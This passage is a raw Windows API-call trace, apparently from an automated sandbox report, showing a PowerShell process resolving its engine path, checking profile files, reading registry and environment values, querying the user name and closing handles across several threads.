(in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.730] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d958 | out: phkResult=0x26d958*=0x308) returned 0x0 [0050.730] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d8dc, lpData=0x0, lpcbData=0x26d8d8*=0x0 | out: lpType=0x26d8dc*=0x1, lpData=0x0, lpcbData=0x26d8d8*=0x56) returned 0x0 [0050.730] CoTaskMemAlloc (cb=0x5a) returned 0x1b87b5a0 [0050.730] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d8ac, lpData=0x1b87b5a0, lpcbData=0x26d8a8*=0x56 | out: lpType=0x26d8ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d8a8*=0x56) returned 0x0 [0050.731] CoTaskMemFree (pv=0x1b87b5a0) [0050.733] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.770] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.785] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.785] CoTaskMemFree (pv=0x1b852880) [0050.786] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.786] CoTaskMemFree (pv=0x1b852880) [0050.786] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.786] CoTaskMemFree (pv=0x1b852880) [0050.789] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.789] CoTaskMemFree (pv=0x1b852880) [0050.792] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.792] CoTaskMemFree (pv=0x1b852880) [0050.792] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.792] CoTaskMemFree (pv=0x1b852880) [0051.013] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b852cc0 [0051.015] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b852dd0 [0051.246] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dab8 | out: phkResult=0x26dab8*=0x3a8) returned 0x0 [0051.264] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26da3c, lpData=0x0, lpcbData=0x26da38*=0x0 | out: lpType=0x26da3c*=0x1, lpData=0x0, lpcbData=0x26da38*=0x56) returned 0x0 [0051.264] CoTaskMemAlloc (cb=0x5a) returned 0x4a8e50 [0051.264] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26da0c, lpData=0x4a8e50, lpcbData=0x26da08*=0x56 | out: lpType=0x26da0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26da08*=0x56) returned 0x0 [0051.265] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26da3c, lpData=0x0, lpcbData=0x26da38*=0x0 | out: lpType=0x26da3c*=0x1, lpData=0x0, lpcbData=0x26da38*=0x56) returned 0x0 [0051.265] CoTaskMemAlloc (cb=0x5a) returned 0x4a8e50 [0051.265] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26da0c, lpData=0x4a8e50, lpcbData=0x26da08*=0x56 | out: lpType=0x26da0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26da08*=0x56) returned 0x0 [0051.265] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x4510a0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0051.265] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x4510a0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0051.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0051.266] SetErrorMode (uMode=0x1) returned 0x1 [0051.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26da20 | out: lpFileInformation=0x26da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.266] SetErrorMode (uMode=0x1) returned 0x1 [0051.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0051.266] SetErrorMode (uMode=0x1) returned 0x1 [0051.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26da20 | out: lpFileInformation=0x26da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.266] SetErrorMode (uMode=0x1) returned 0x1 [0051.266] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0051.266] SetErrorMode (uMode=0x1) returned 0x1 [0051.266] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26da20 | out: lpFileInformation=0x26da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.267] SetErrorMode (uMode=0x1) returned 0x1 [0051.267] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0051.267] SetErrorMode (uMode=0x1) returned 0x1 [0051.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26da20 | out: lpFileInformation=0x26da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.267] SetErrorMode (uMode=0x1) returned 0x1 [0051.268] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.268] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.269] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.270] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.270] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.271] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0051.273] SetEvent (hEvent=0x3a8) returned 1 [0051.273] SetEvent (hEvent=0x358) returned 1 [0051.273] SetEvent (hEvent=0x37c) returned 1 [0051.274] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.275] RegQueryValueExW (in: hKey=0x310, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d8dc, lpData=0x0, lpcbData=0x26d8d8*=0x0 | out: lpType=0x26d8dc*=0x0, lpData=0x0, lpcbData=0x26d8d8*=0x0) returned 0x2 [0052.463] RegQueryValueExW (in: hKey=0x468, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d96c, lpData=0x0, lpcbData=0x26d968*=0x0 | out: lpType=0x26d96c*=0x0, lpData=0x0, lpcbData=0x26d968*=0x0) returned 0x2 [0052.517] SetEvent (hEvent=0x3ec) returned 1 [0052.517] SetEvent (hEvent=0x3e4) returned 1 [0052.517] SetEvent (hEvent=0x3f4) returned 1 [0052.536] CoTaskMemFree (pv=0x1b852ee0) [0052.664] SetEvent (hEvent=0x320) returned 1 [0052.665] CoTaskMemAlloc (cb=0x804) returned 0x1b8acc80 [0052.665] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8acc80, nSize=0x26da88 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26da88) returned 0x1 [0052.665] CoTaskMemFree (pv=0x1b8acc80) [0052.665] CoTaskMemAlloc (cb=0x204) returned 0x43dc70 [0052.665] GetUserNameW (in: lpBuffer=0x43dc70, pcbBuffer=0x26dac8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26dac8) returned 1 [0052.666] CoTaskMemFree (pv=0x43dc70) [0052.666] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f40158*="Stopped", lpRawData=0x2f3fee8) returned 1 [0052.668] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0052.670] CoGetContextToken (in: pToken=0x26f650 | out: pToken=0x26f650) returned 0x0 [0052.670] CObjectContext::QueryInterface () returned 0x0 [0052.670] CObjectContext::GetCurrentThreadType () returned 0x0 [0052.670] Release () returned 0x0 [0052.672] CoGetContextToken (in: pToken=0x26f220 | out: pToken=0x26f220) returned 0x0 [0052.672] CObjectContext::QueryInterface () returned 0x0 [0052.672] CObjectContext::GetCurrentThreadType () returned 0x0 [0052.672] Release () returned 0x0 [0052.674] CoGetContextToken (in: pToken=0x26f220 | out: pToken=0x26f220) returned 0x0 [0052.674] CObjectContext::QueryInterface () returned 0x0 [0052.675] CObjectContext::GetCurrentThreadType () returned 0x0 [0052.675] Release () returned 0x0 [0052.699] CoUninitialize () Thread: id = 25 os_tid = 0x9b4 Thread: id = 26 os_tid = 0x9b8 Thread: id = 27 os_tid = 0x9bc Thread: id = 28 os_tid = 0x9c0 Thread: id = 29 os_tid = 0x9c4 [0045.481] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0048.948] LocalFree (hMem=0x3f6260) returned 0x0 [0048.948] CloseHandle (hObject=0x324) returned 1 [0048.949] CloseHandle (hObject=0x13) returned 1 [0048.949] CloseHandle (hObject=0xf) returned 1 [0048.950] RegCloseKey (hKey=0x310) returned 0x0 [0048.950] RegCloseKey (hKey=0x30c) returned 0x0 [0048.950] RegCloseKey (hKey=0x308) returned 0x0 [0048.950] LocalFree (hMem=0x3f6230) returned 0x0 [0048.950] RegCloseKey (hKey=0x330) returned 0x0 [0050.512] RegCloseKey (hKey=0x374) returned 0x0 [0050.512] RegCloseKey (hKey=0x370) returned 0x0 [0050.512] RegCloseKey (hKey=0x36c) returned 0x0 [0050.513] RegCloseKey (hKey=0x368) returned 0x0 [0050.513] RegCloseKey (hKey=0x364) returned 0x0 [0050.513] RegCloseKey (hKey=0x360) returned 0x0 [0050.513] RegCloseKey (hKey=0x35c) returned 0x0 [0050.514] RegCloseKey (hKey=0x3a4) returned 0x0 [0050.514] RegCloseKey (hKey=0x3a0) returned 0x0 [0050.514] RegCloseKey (hKey=0x34c) returned 0x0 [0050.514] RegCloseKey (hKey=0x348) returned 0x0 [0050.515] RegCloseKey (hKey=0x344) returned 0x0 [0050.515] RegCloseKey (hKey=0x340) returned 0x0 [0050.515] RegCloseKey (hKey=0x33c) returned 0x0 [0050.515] RegCloseKey (hKey=0x338) returned 0x0 [0050.516] RegCloseKey (hKey=0x334) returned 0x0 [0050.516] RegCloseKey (hKey=0x310) returned 0x0 [0050.516] RegCloseKey (hKey=0x30c) returned 0x0 [0050.516] RegCloseKey (hKey=0x39c) returned 0x0 [0050.516] RegCloseKey (hKey=0x398) returned 0x0 [0050.517] RegCloseKey (hKey=0x378) returned 0x0 [0050.517] RegCloseKey (hKey=0x3ac) returned 0x0 [0050.517] RegCloseKey (hKey=0x390) returned 0x0 [0050.517] RegCloseKey (hKey=0x38c) returned 0x0 [0050.518] RegCloseKey (hKey=0x388) returned 0x0 [0050.518] RegCloseKey (hKey=0x384) returned 0x0 [0050.518] RegCloseKey (hKey=0x380) returned 0x0 [0050.518] RegCloseKey (hKey=0x37c) returned 0x0 [0050.519] RegCloseKey (hKey=0x358) returned 0x0 [0050.519] RegCloseKey (hKey=0x3a8) returned 0x0 [0050.519] RegCloseKey (hKey=0x308) returned 0x0 [0052.050] RegCloseKey (hKey=0x310) returned 0x0 [0052.050] CloseHandle (hObject=0xf) returned 1 [0052.674] LocalFree (hMem=0x1b852dd0) returned 0x0 [0052.674] LocalFree (hMem=0x1b852cc0) returned 0x0 [0052.678] DeregisterEventSource (hEventLog=0x1b950008) returned 1 [0052.691] CloseHandle (hObject=0x430) returned 1 [0052.691] CloseHandle (hObject=0x35c) returned 1 [0052.691] CloseHandle (hObject=0x458) returned 1 [0052.691] RegCloseKey (hKey=0x468) returned 0x0 [0052.692] CloseHandle (hObject=0x464) returned 1 [0052.692] CloseHandle (hObject=0x30c) returned 1 [0052.692] CloseHandle (hObject=0x460) returned 1 [0052.692] CloseHandle (hObject=0x39c) returned 1 [0052.692] CloseHandle (hObject=0x398) returned 1 [0052.693] CloseHandle (hObject=0x378) returned 1 [0052.693] CloseHandle (hObject=0x3ac) returned 1 [0052.693] CloseHandle (hObject=0x390) returned 1 [0052.693] CloseHandle (hObject=0x38c) returned 1 [0052.693] CloseHandle (hObject=0x388) returned 1 [0052.694] CloseHandle (hObject=0x384) returned 1 [0052.694] CloseHandle (hObject=0x380) returned 1 [0052.694] CloseHandle (hObject=0x37c) returned 1 [0052.694] CloseHandle (hObject=0x358) returned 1 [0052.694] CloseHandle (hObject=0x3a8) returned 1 [0052.695] CloseHandle (hObject=0x45c) returned 1 [0052.695] CloseHandle (hObject=0x414) returned 1 [0052.695] CloseHandle (hObject=0x44c) returned 1 [0052.695] CloseHandle (hObject=0x3fc) returned 1 [0052.695] CloseHandle (hObject=0x3f4) returned 1 [0052.696] CloseHandle (hObject=0x32c) returned 1 [0052.696] CloseHandle (hObject=0x3e4) returned 1 [0052.696] CloseHandle (hObject=0x3ec) returned 1 [0052.696] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0052.696] CloseHandle (hObject=0x3f0) returned 1 [0052.697] CloseHandle (hObject=0x2f0) returned 1 [0052.697] CloseHandle (hObject=0x320) returned 1 [0052.697] UnmapViewOfFile (lpBaseAddress=0x27e0000) returned 1 [0052.698] CloseHandle (hObject=0x42c) returned 1 Thread: id = 30 os_tid = 0x9c8 Thread: id = 32 os_tid = 0xa54 [0051.278] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0051.282] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0051.286] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.286] CoTaskMemFree (pv=0x1b852ee0) [0051.288] VirtualQuery (in: lpAddress=0x1c85dc60, lpBuffer=0x1c85eb20, dwLength=0x30 | out: lpBuffer=0x1c85eb20*(BaseAddress=0x1c85d000, AllocationBase=0x1bed0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0051.293] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.293] CoTaskMemFree (pv=0x1b852ee0) [0051.295] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.295] CoTaskMemFree (pv=0x1b852ee0) [0051.298] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.298] CoTaskMemFree (pv=0x1b852ee0) [0051.309] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.309] CoTaskMemFree (pv=0x1b852ee0) [0051.311] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.311] CoTaskMemFree (pv=0x1b852ee0) [0051.313] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.313] CoTaskMemFree (pv=0x1b852ee0) [0051.317] VirtualQuery (in: lpAddress=0x1c85df10, lpBuffer=0x1c85edd0, dwLength=0x30 | out: lpBuffer=0x1c85edd0*(BaseAddress=0x1c85d000, AllocationBase=0x1bed0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0051.318] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.318] CoTaskMemFree (pv=0x1b852ee0) [0051.320] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.320] CoTaskMemFree (pv=0x1b852ee0) [0051.320] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.320] CoTaskMemFree (pv=0x1b852ee0) [0051.321] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.321] CoTaskMemFree (pv=0x1b852ee0) [0051.325] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.325] CoTaskMemFree (pv=0x1b852ee0) [0051.363] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.363] CoTaskMemFree (pv=0x1b852ee0) [0051.366] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.366] CoTaskMemFree (pv=0x1b852ee0) [0051.367] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.367] CoTaskMemFree (pv=0x1b852ee0) [0051.370] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.370] CoTaskMemFree (pv=0x1b852ee0) [0051.371] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.371] CoTaskMemFree (pv=0x1b852ee0) [0051.372] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.372] CoTaskMemFree (pv=0x1b852ee0) [0051.374] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.374] CoTaskMemFree (pv=0x1b852ee0) [0051.389] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.389] CoTaskMemFree (pv=0x1b852ee0) [0051.397] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.398] CoTaskMemFree (pv=0x1b852ee0) [0051.400] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", 